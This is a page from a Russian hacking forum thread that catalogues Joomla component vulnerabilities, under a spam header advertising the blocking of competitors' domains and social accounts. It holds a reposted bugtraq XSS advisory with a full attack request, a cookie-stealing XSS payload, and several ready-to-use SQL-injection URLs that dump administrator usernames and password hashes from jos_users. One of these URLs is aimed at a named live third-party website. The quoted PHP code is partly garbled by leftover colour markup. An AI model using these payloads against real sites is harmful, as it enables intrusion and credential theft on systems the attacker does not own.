УСТРАНЕНИЕ КОНКУРЕНТОВ. БЛОКИРОВКА ДОМЕНОВ, БЛОКИРОВКА ИНСТАГРАМ/ТЕЛЕГРАМ И ДРУГОЕ. ПРОВЕРЕННЫЙ СЕЛЛЕР.

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.

		Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости > Веб-уязвимости
Обзор уязвимостей CMS [Joomla,Mambo] и их компонентов

Страница 23 из 37

« Первая

Последняя »

Опции темы

Поиск в этой теме

Опции просмотра

#221

16.08.2011, 10:28

eclipse

Guest

Сообщений: n/a

Провел на форуме:
30555

Репутация: 85

Множественные уязвимости вида "Межсайтовый скриптинг" в Joomla всех версийот 1.6.x до 1.7.0 RC

Цитата:

Сообщение от None

List: bugtraq
Subject: Joomla! 1.7.0-RC and lower | Multiple Cross Site Scripting (XSS) Vulnerabilities
From: YGN Ethical Hacker Group
Date: 2011-07-22 3:16:57
Message-ID: CAPYM6VyqAzsUA_qV2n4q9N8dvuZZWadn2us9aZTH08udvQm89 A () mail ! gmail ! com
[Download message RAW]
Joomla! 1.7.0-RC and lower | Multiple Cross Site Scripting (XSS)
Vulnerabilities
1. OVERVIEW
Joomla! 1.7.0-RC and versions of 1.6.x are vulnerable to multiple
Cross Site Scripting issues.
2. BACKGROUND
Joomla is a free and open source content management system (CMS) for
publishing content on the World Wide Web and intranets. It comprises a
modelтАУviewтАУcontroller (MVC) Web application framework that can also be
used independently.
Joomla is written in PHP, uses object-oriented programming (OOP)
techniques and software design patterns, stores data in a MySQL
database, and includes features such as page caching, RSS feeds,
printable versions of pages, news flashes, blogs, polls, search, and
support for language internationalization.
3. VULNERABILITY DESCRIPTION
Several parameters (searchword, Request URI) in Joomla! Core
components are not properly sanitized upon submission to the
/index.php url, which allows attacker to conduct Cross Site Scripting
attack. This may allow an attacker to create a specially crafted URL
that would execute arbitrary script code in a victim's browser.
4. VERSION AFFECTED
1.7.0-RC and all versions of 1.6.x
5. PROOF-OF-CONCEPT/EXPLOIT
component: com_search, parameter: searchword (Browser: IE, Konqueror)
================================================== ===================
N.B. Our previous reported issue (1.6.3) of "searchword" parameter XSS
was not fixed completely.
[REQUEST]
POST /joomla164_noseo/index.php HTTP/1.1
Host: localhost
Accept: */*
Accept-Language: en
User-Agent: MSIE 8.0
Connection: close
Referer: http://localhost/joomla164_noseo/
Content-Type: application/x-www-form-urlencoded
Content-Length: 456
task=search&Itemid=435&searchword=Search';onunload =function(){x=confirm(String.fromCha \
rCode(89,111,117,39,118,101,32,103,111,116,32,97,3 2,109,101,115,115,97,103,101,32,102, \
114,111,109,32,65,100,109,105,110,105,115,116,114, 97,116,111,114,33,10,68,111,32,121,1 \
11,117,32,119,97,110,116,32,116,111,32,103,111,32, 116,111,32,73,110,98,111,120,63));al \
ert(String.fromCharCode(89,111,117,39,118,101,32,1 03,111,116,32,88,83,83,33));};//xsss \
ssssssss&option=com_search [/REQUEST]
XSS in Request URI
====================
File: ./includes/application.php
Line: 176, 181
Code: $document->setBase(JURI::current()); // instead of
$document->setBase(htmlspecialchars(JURI::current()));
http://localhost/joomla164/index.php/using-joomla/extensions/components/news-feeds-com \
ponent/new-feed-categories/'">alert(/XSS/)
http://localhost/joomla164/index.php/using-joomla/extensions/components/content-compon \
ent/article-category-list/24-joomla'">alert(/XSS/)
http://localhost/joomla164/index.php/using-joomla/extensions/components/search-compone \
nt/search/'">alert(/XSS/)
http://localhost/joomla164/index.php/using-joomla/extensions/components/contact-compon \
ent/contact-categories/'">alert(/XSS/)
http://localhost/joomla164/index.php/site-map/contacts/'">alert(/XSS/)
http://localhost/joomla164/index.php/component/banners/click/3'">alert(/XSS/)
http://localhost/joomla164/index.php/fruit-encyclopedia/'">alert(/XSS/)
http://localhost/joomla164/index.php/fruit-encyclopedia/38-a'">alert(/XSS/)
http://localhost/joomla164/index.php/fruit-encyclopedia/39-b'">alert(/XSS/)
http://localhost/joomla164/index.php/fruit-encyclopedia/57-t'">alert(/XSS/)
http://localhost/joomla164/index.php/growers/23-happy-orange-orchard'">alert(/ \
XSS/)
http://localhost/joomla164/index.php/image-gallery/animals/25-koala'">alert(/X \
SS/)
http://localhost/joomla164/index.php/image-gallery/scenery/64-blue-mountain-rain-fores \
t'">alert(/XSS/)
http://localhost/joomla164/index.php/image-gallery/scenery/65-ormiston-pound'">alert(/XSS/)
http://localhost/joomla164/index.php/using-joomla/extensions/components/contact-compon \
ent/contact-categories/34-park-site/'">alert(/XSS/)
http://localhost/joomla164/index.php/using-joomla/extensions/components/contact-compon \
ent/contact-categories/34-park-site/2-webmaster'">alert(/XSS/)
http://localhost/joomla164/index.php/using-joomla/extensions/components/contact-compon \
ent/contact-categories/35-shop-site/'">alert(/XSS/)
http://localhost/joomla164/index.php/using-joomla/extensions/components/contact-compon \
ent/contact-categories/35-shop-site/8-shop-address'">alert(/XSS/)
http://localhost/joomla164/index.php/using-joomla/extensions/components/content-compon \
ent/archived-articles/9-uncategorised'">alert(/XSS/)
http://localhost/joomla164/index.php/using-joomla/extensions/components/content-compon \
ent/archived-articles/9-uncategorised/'">alert(/XSS/)
http://localhost/joomla164/index.php/using-joomla/extensions/components/content-compon \
ent/archived-articles/9-uncategorised/67-whats-new-in-15'">alert(/XSS/)
http://localhost/joomla164/index.php/using-joomla/extensions/components/content-compon \
ent/article-categories/26-park-site'">alert(/XSS/)
http://localhost/joomla164/index.php/using-joomla/extensions/components/content-compon \
ent/article-categories/29-fruit-shop-site'">alert(/XSS/)
http://localhost/joomla164/index.php/using-joomla/extensions/components/content-compon \
ent/article-category-list/20-extensions'">alert(/XSS/)
http://localhost/joomla164/index.php/using-joomla/extensions/components/content-compon \
ent/article-category-list/24-joomla'">alert(/XSS/)
http://localhost/joomla164/index.php/using-joomla/extensions/components/news-feeds-com \
ponent/news-feed-category/'">alert(/XSS/)
http://localhost/joomla164/index.php/using-joomla/extensions/components/news-feeds-com \
ponent/news-feed-category/1-joomla-announcements'">alert(/XSS/)
http://localhost/joomla164/index.php/using-joomla/extensions/components/news-feeds-com \
ponent/news-feed-category/2-new-joomla-extensions'">alert(/XSS/)
http://localhost/joomla164/index.php/using-joomla/extensions/components/news-feeds-com \
ponent/news-feed-category/3-joomla-security-news'">alert(/XSS/)
++++++++++++++++++++++++++++++++++++++++++++++++++ ++++++++++
6. IMPACT
Attackers can compromise currently logged-in user/administrator
session and impersonate arbitrary user actions available under
/administrator/ functions.
7. SOLUTION
The development of Joomla! 1.6.x has been ceased; there will be no
fixed version for 1.6.x.
Upgrade to Joomla! 1.7.0-stable or higher.
8. VENDOR
Joomla! Developer Team
http://www.joomla.org
9. CREDIT
This vulnerability was discovered by Aung Khant, http://yehg.net, YGN
Ethical Hacker Group, Myanmar.
10. DISCLOSURE TIME-LINE
2011-07-02: notified vendor
2011-07-19: patched version, 1.7.0, released
2011-07-22: vulnerability disclosed
11. REFERENCES
Original Advisory URL:
http://yehg.net/lab/pr0js/advisories/joomla/core/[joomla_1.6.5]_cross_site_scripting(X \
SS) Previous Advisory URL:
http://yehg.net/lab/pr0js/advisories/joomla/core/[joomla_1.6.3]_cross_site_scripting(X \
SS) http://yehg.net/lab/#advisories.joomla
Vendor Advisory URL:
http://developer.joomla.org/security/news/357-20110701-xss-vulnerability.html
#yehg [2011-07-22]

Источник: http://marc.info/?l=bugtraq&m=131160497113679&w=2

#222

23.08.2011, 14:59

z0mbyak

Познающий

Регистрация: 10.04.2010

Сообщений: 49

Провел на форуме:
168709

Репутация: 1

Joomla com_hbstopdestinations SQL-inj

Joomla com_hbstopdestinations SQL-inj vuln

Этот компоненты специально для отелей, не очень популярен...

Exploit:

index.php?option=com_hbstopdestinations&task=detai ls&h_id=-50+union+select+1,2,3,4,5,6,7,8,9,10,1,2,3,4,5,6,7 ,8,9,10,1,2,3,4,5,6,7,8,9,10,1,2,3,4,5,6,7,8,9,10, 1,2,3,4,5,6,7,8,9,10,1,2,3,4,5,6,7,8,9,10,1,2,3,4, 5,6,7,8,9,10,1,2,3,4,5,6,7,8,9--&cId=&sId=&cityId=&f_date=&t_date=

POC:

http://zambiatourismnews.com/index.php?option=com_hbstopdestinations&task=detai ls&h_id=-50+union+select+1,2,3,4,5,6,7,8,9,10,1,2,3,4,5,6,7 ,8,9,10,1,2,3,4,5,6,7,8,9,10,1,2,3,4,5,6,7,8,9,10, 1,2,3,4,5,6,7,8,9,10,1,2,3,4,5,6,7,8,9,10,1,2,3,4, 5,6,7,8,9,10,1,2,3,4,5,6,7,8,9--&cId=&sId=&cityId=&f_date=&t_date=

Код не покажу, так как не залился)

#223

24.08.2011, 18:46

Unknown

Guest

Сообщений: n/a

Провел на форуме:
4100

Репутация: 74

com_tweetportsSQL-Injection (1.5 && 1.6)

tweetports.helper.php

PHP код:


		
			
PHP:
[COLOR="#000000"][COLOR="#0000BB"][/COLOR][COLOR="#007700"]...

    function[/COLOR][COLOR="#0000BB"]existLocationName[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$name[/COLOR][COLOR="#007700"]) {

[/COLOR][COLOR="#0000BB"]$db[/COLOR][COLOR="#007700"]=&[/COLOR][COLOR="#0000BB"]JFactory[/COLOR][COLOR="#007700"]::[/COLOR][COLOR="#0000BB"]getDBO[/COLOR][COLOR="#007700"]();

[/COLOR][COLOR="#0000BB"]$query[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#DD0000"]"SELECT id FROM #__tweetports_geocodes WHERE location = '"[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]$name[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#DD0000"]"'"[/COLOR][COLOR="#007700"];

[/COLOR][COLOR="#0000BB"]$db[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]setQuery[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$query[/COLOR][COLOR="#007700"]);

[/COLOR][COLOR="#0000BB"]$addressID[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]$db[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]loadResult[/COLOR][COLOR="#007700"]();

        

        return[/COLOR][COLOR="#0000BB"]$addressID[/COLOR][COLOR="#007700"];

    }

...

    function[/COLOR][COLOR="#0000BB"]existAddress[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$address[/COLOR][COLOR="#007700"]) {

[/COLOR][COLOR="#0000BB"]$db[/COLOR][COLOR="#007700"]=&[/COLOR][COLOR="#0000BB"]JFactory[/COLOR][COLOR="#007700"]::[/COLOR][COLOR="#0000BB"]getDBO[/COLOR][COLOR="#007700"]();

[/COLOR][COLOR="#0000BB"]$query[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#DD0000"]"SELECT id FROM #__tweetports_geocodes WHERE address = '"[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]$address[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#DD0000"]"'"[/COLOR][COLOR="#007700"];

[/COLOR][COLOR="#0000BB"]$db[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]setQuery[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$query[/COLOR][COLOR="#007700"]);

[/COLOR][COLOR="#0000BB"]$addressID[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]$db[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]loadResult[/COLOR][COLOR="#007700"]();

        

        return[/COLOR][COLOR="#0000BB"]$addressID[/COLOR][COLOR="#007700"];

    }

....

[/COLOR][/COLOR]

locations.php

PHP код:


		
			
PHP:
[COLOR="#000000"][COLOR="#0000BB"][/COLOR][COLOR="#007700"]class[/COLOR][COLOR="#0000BB"]TweetportsModelLocations[/COLOR][COLOR="#007700"]extends[/COLOR][COLOR="#0000BB"]JModel

[/COLOR][COLOR="#007700"]{

....

    function[/COLOR][COLOR="#0000BB"]saveLocation[/COLOR][COLOR="#007700"]() {

        

        if (isset([/COLOR][COLOR="#0000BB"]$_POST[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'Submit'[/COLOR][COLOR="#007700"]]) &&[/COLOR][COLOR="#0000BB"]$_POST[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'Submit'[/COLOR][COLOR="#007700"]] ==[/COLOR][COLOR="#DD0000"]"Save"[/COLOR][COLOR="#007700"]) {  

        

[/COLOR][COLOR="#0000BB"]$nameID[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]TweetportsHelper[/COLOR][COLOR="#007700"]::[/COLOR][COLOR="#0000BB"]existLocationName[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$_POST[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'locationname'[/COLOR][COLOR="#007700"]]);

[/COLOR][COLOR="#0000BB"]$addressID[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]TweetportsHelper[/COLOR][COLOR="#007700"]::[/COLOR][COLOR="#0000BB"]existAddress[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$_POST[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'locationaddress'[/COLOR][COLOR="#007700"]]);

[/COLOR][COLOR="#0000BB"]$hashtagID[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]TweetportsHelper[/COLOR][COLOR="#007700"]::[/COLOR][COLOR="#0000BB"]existHashtag[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$_POST[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'locationhashtag'[/COLOR][COLOR="#007700"]]);

            

            if ([/COLOR][COLOR="#0000BB"]$addressID[/COLOR][COLOR="#007700"]>[/COLOR][COLOR="#0000BB"]0[/COLOR][COLOR="#007700"]) {

[/COLOR][COLOR="#0000BB"]$notice[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#DD0000"]"Address already exists!  Please try another port."[/COLOR][COLOR="#007700"];

            } else if ([/COLOR][COLOR="#0000BB"]$hashtagID[/COLOR][COLOR="#007700"]>[/COLOR][COLOR="#0000BB"]0[/COLOR][COLOR="#007700"]) {

[/COLOR][COLOR="#0000BB"]$notice[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#DD0000"]"Hashtag already exists!  Please try another Hashtag."[/COLOR][COLOR="#007700"];

            } else if ([/COLOR][COLOR="#0000BB"]$nameID[/COLOR][COLOR="#007700"]>[/COLOR][COLOR="#0000BB"]0[/COLOR][COLOR="#007700"]) {

[/COLOR][COLOR="#0000BB"]$notice[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#DD0000"]"Location Name already exists!  Please try another Hashtag."[/COLOR][COLOR="#007700"];

            } else {

[/COLOR][COLOR="#0000BB"]TweetportsHelper[/COLOR][COLOR="#007700"]::[/COLOR][COLOR="#0000BB"]addLocation[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$_POST[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'locationname'[/COLOR][COLOR="#007700"]],[/COLOR][COLOR="#0000BB"]$_POST[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'locationaddress'[/COLOR][COLOR="#007700"]],[/COLOR][COLOR="#0000BB"]$_POST[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'locationhashtag'[/COLOR][COLOR="#007700"]]);

[/COLOR][COLOR="#0000BB"]$notice[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]JText[/COLOR][COLOR="#007700"]::[/COLOR][COLOR="#0000BB"]_[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]"LOCATION THANKS"[/COLOR][COLOR="#007700"]);

            }

        }

        return[/COLOR][COLOR="#0000BB"]$notice[/COLOR][COLOR="#007700"]; 

    }

....

}

[/COLOR][/COLOR]

exploit:

PHP код:


		
			
PHP:
[COLOR="#000000"][COLOR="#0000BB"][/COLOR][COLOR="#007700"][/COLOR] 

[/COLOR]

com_mediaideamultilist sql-inj (1.5&1.6) [p.s. мож уже начнем версии двига писать(под которые компонент или модуль заточен)?!]

vulner files dbfuncs.php & standardlist & helpers.php

PHP код:


		
			
PHP:
[COLOR="#000000"][COLOR="#0000BB"]не влезли[/COLOR][/COLOR]

зато exploit безотказен

PHP код:


		
			
PHP:
[COLOR="#000000"][COLOR="#0000BB"]index[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]php[/COLOR][COLOR="#007700"]?[/COLOR][COLOR="#0000BB"]option[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]com_mediaideamultilist[/COLOR][COLOR="#007700"]&[/COLOR][COLOR="#0000BB"]controller[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]helpers[/COLOR][COLOR="#007700"]&[/COLOR][COLOR="#0000BB"]format[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]raw[/COLOR][COLOR="#007700"]&[/COLOR][COLOR="#0000BB"]task[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]getField[/COLOR][COLOR="#007700"]&[/COLOR][COLOR="#0000BB"]tarId[/COLOR][COLOR="#007700"]=

-[/COLOR][COLOR="#0000BB"]666[/COLOR][COLOR="#007700"]+[/COLOR][COLOR="#0000BB"]UNION[/COLOR][COLOR="#007700"]+[/COLOR][COLOR="#0000BB"]SELECT[/COLOR][COLOR="#007700"]+[/COLOR][COLOR="#0000BB"]1[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]2[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]3[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]4[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]5[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]6[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]7[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]8[/COLOR][COLOR="#007700"],

[/COLOR][COLOR="#0000BB"]group_concat[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]username[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]0x3a[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]password[/COLOR][COLOR="#007700"]+[/COLOR][COLOR="#0000BB"]SEPARATOR[/COLOR][COLOR="#007700"]+[/COLOR][COLOR="#0000BB"]0x3c62723e[/COLOR][COLOR="#007700"]),

[/COLOR][COLOR="#0000BB"]10[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]11[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]12[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]13[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]14[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]15[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]16[/COLOR][COLOR="#007700"]+[/COLOR][COLOR="#0000BB"]from[/COLOR][COLOR="#007700"]+[/COLOR][COLOR="#0000BB"]jos_users[/COLOR][COLOR="#007700"]+[/COLOR][COLOR="#0000BB"]where[/COLOR][COLOR="#007700"]+

[/COLOR][COLOR="#0000BB"]usertype[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]0x53757065722041646D696E6973747261746F72[/COLOR][COLOR="#007700"]--[/COLOR][/COLOR]

#224

26.08.2011, 19:49

DeleTeeeX

Guest

Сообщений: n/a

Провел на форуме:
5429

Репутация: -1

[B]Joomla 1.5 com_virtuemart

#225

27.08.2011, 03:57

Unknown

Guest

Сообщений: n/a

Провел на форуме:
18928

Репутация: 3

XSS vulnerability in JComments

Уязвимые верси: 2.1.0.0 [07/08/2009] и, возможно, ранние

Уведомление JoomlaTune.com: 4 Июня 2011

Тип уязвимости: XSS

Статус: исправлено JoomlaTune.com

Степень опасности: Средний

Детали уязвимости: пользователь может выполнить произвольный JS код в уязвимом приложении. Уязвимость возникает из-за неправильной идентификации пользователя в "admin.jcomments.php". Успешное проведение атаки с помощью данной уязвимости может привести к потере конфиденциальных данных и краже идентификационной информации в виде куков.

Атакующий может использовать браузер для проведения атаки:

Код:

alert(document.cookie)'>

document.main.submit();

Решение: обновление к более поздней версии

#226

05.09.2011, 00:12

Unknown

Guest

Сообщений: n/a

Провел на форуме:
4100

Репутация: 74

Понеслась...

1 :: com_messaging :: SQL-inj && v1.5

com_messaging.php

PHP код:


		
			
PHP:
[COLOR="#000000"][COLOR="#0000BB"][/COLOR][COLOR="#007700"]...

require_once([/COLOR][COLOR="#0000BB"]dirname[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]__FILE__[/COLOR][COLOR="#007700"]).[/COLOR][COLOR="#0000BB"]DS[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#DD0000"]'helper.php'[/COLOR][COLOR="#007700"]);

...

[/COLOR][COLOR="#0000BB"]$params[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'id'[/COLOR][COLOR="#007700"]] =[/COLOR][COLOR="#0000BB"]$_GET[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'mesuid'[/COLOR][COLOR="#007700"]];

...

[/COLOR][COLOR="#0000BB"]$messages[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]modMessagingHelper[/COLOR][COLOR="#007700"]::[/COLOR][COLOR="#0000BB"]getMessaging[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$params[/COLOR][COLOR="#007700"]);

...

[/COLOR][/COLOR]

helper.php

PHP код:


		
			
PHP:
[COLOR="#000000"][COLOR="#0000BB"][/COLOR][COLOR="#007700"][/COLOR][COLOR="#0000BB"]guest[/COLOR][COLOR="#007700"]){

            return -[/COLOR][COLOR="#0000BB"]1[/COLOR][COLOR="#007700"];

        }else{

[/COLOR][COLOR="#0000BB"]$query[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#DD0000"]" SELECT * FROM #__messaging WHERE idTo='[/COLOR][COLOR="#007700"]{[/COLOR][COLOR="#0000BB"]$user[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'id'[/COLOR][COLOR="#007700"]]}[/COLOR][COLOR="#DD0000"]' AND seen=0 ORDER BY date DESC"[/COLOR][COLOR="#007700"];

[/COLOR][COLOR="#0000BB"]$_db[/COLOR][COLOR="#007700"]= &[/COLOR][COLOR="#0000BB"]JFactory[/COLOR][COLOR="#007700"]::[/COLOR][COLOR="#0000BB"]getDBO[/COLOR][COLOR="#007700"]();

[/COLOR][COLOR="#0000BB"]$_db[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]setQuery[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$query[/COLOR][COLOR="#007700"]);

[/COLOR][COLOR="#0000BB"]$data[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]$_db[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]loadObjectList[/COLOR][COLOR="#007700"]();

            return[/COLOR][COLOR="#0000BB"]sizeof[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$data[/COLOR][COLOR="#007700"]);

        }

    }

}

[/COLOR][COLOR="#0000BB"]?>

[/COLOR][/COLOR]

exploit:

PHP код:


		
			
PHP:
[COLOR="#000000"][COLOR="#0000BB"]http[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#FF8000"]//j15/index.php?option=com_messaging&view=message&mesuid=-666++union+select+1,group_concat(username,0x3a,password+SEPARATOR+0x3c62723e),3,4,5,6,7,8,9+from+jos_users+where+usertype=0x53757065722041646D696E6973747261746F72--

[/COLOR][/COLOR]

2 :: com_azcontentlist :: SQL-inj && v1.5

azcontentlist.php

PHP код:


		
			
PHP:
[COLOR="#000000"][COLOR="#0000BB"][/COLOR][COLOR="#007700"]...

[/COLOR][COLOR="#0000BB"]$date[/COLOR][COLOR="#007700"]= new[/COLOR][COLOR="#0000BB"]JDate[/COLOR][COLOR="#007700"]();

[/COLOR][COLOR="#0000BB"]$now[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]$date[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]toMySQL[/COLOR][COLOR="#007700"]();

[/COLOR][COLOR="#0000BB"]$database[/COLOR][COLOR="#007700"]=&[/COLOR][COLOR="#0000BB"]JFactory[/COLOR][COLOR="#007700"]::[/COLOR][COLOR="#0000BB"]getDBO[/COLOR][COLOR="#007700"]();

[/COLOR][COLOR="#0000BB"]$nullDate[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]$database[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]getNullDate[/COLOR][COLOR="#007700"]();

[/COLOR][COLOR="#0000BB"]$database[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]setQuery[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]"SELECT c.title AS title, c.id, c.catid, c.sectionid, cc.title AS category, s.title AS section FROM #__content AS c"

[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#DD0000"]' LEFT JOIN #__categories AS cc ON cc.id = c.catid'

[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#DD0000"]' LEFT JOIN #__sections AS s ON s.id = c.sectionid'

[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#DD0000"]" WHERE c.access = 0 AND c.state = 1"

[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#DD0000"]' AND cc.access = 0'

[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#DD0000"]' AND s.access = 0'

[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#DD0000"]" AND ( publish_up = "[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]$_GET[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'date'[/COLOR][COLOR="#007700"]] .[/COLOR][COLOR="#DD0000"]" OR publish_up [/COLOR][COLOR="#0000BB"]Quote[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$now[/COLOR][COLOR="#007700"]) .[/COLOR][COLOR="#DD0000"]" )"

[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#DD0000"]" ORDER BY title"

[/COLOR][COLOR="#007700"]);

[/COLOR][COLOR="#0000BB"]$results[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]$database[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]loadAssocList[/COLOR][COLOR="#007700"]();

        echo[/COLOR][COLOR="#DD0000"]'A-Z Site Map'[/COLOR][COLOR="#007700"];

        echo[/COLOR][COLOR="#DD0000"]''[/COLOR][COLOR="#007700"];

        foreach([/COLOR][COLOR="#0000BB"]$results[/COLOR][COLOR="#007700"]as[/COLOR][COLOR="#0000BB"]$result[/COLOR][COLOR="#007700"]) {

[/COLOR][COLOR="#FF8000"]//$app =& JFactory::getApplication();

                //$Itemid = $app->getItemid( $result['id'] );

[/COLOR][COLOR="#007700"]...

[/COLOR][/COLOR]

exploit:

PHP код:


		
			
PHP:
[COLOR="#000000"][COLOR="#0000BB"]http[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#FF8000"]//j15/index.php?option=com_azcontentlist&view=title&cat=3&date=-666++union+select+1,2,3,4,group_concat(username,0x3a,password+SEPARATOR+0x3c62723e),6,7+from+jos_users+where+usertype=0x53757065722041646D696E6973747261746F72--

[/COLOR][/COLOR]

3 :: Jootags component :: SQL-inj && v1.5

tags.php

PHP код:


		
			
PHP:
[COLOR="#000000"][COLOR="#0000BB"][/COLOR][COLOR="#007700"]...

    function[/COLOR][COLOR="#0000BB"]getTagByTitle[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$title[/COLOR][COLOR="#007700"]) {

        

[/COLOR][COLOR="#0000BB"]$query[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#DD0000"]' SELECT t.id '

[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#DD0000"]' FROM #__jootags_tags AS t '

[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#DD0000"]" WHERE t.title='[/COLOR][COLOR="#0000BB"]$title[/COLOR][COLOR="#DD0000"]'"[/COLOR][COLOR="#007700"];

[/COLOR][COLOR="#0000BB"]$this[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]_db[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]setQuery[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$query[/COLOR][COLOR="#007700"]);

        

        return[/COLOR][COLOR="#0000BB"]$this[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]_db[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]LoadResult[/COLOR][COLOR="#007700"]();        

    }

...

[/COLOR][/COLOR]

controller.php

PHP код:


		
			
PHP:
[COLOR="#000000"][COLOR="#0000BB"][/COLOR][COLOR="#007700"]...

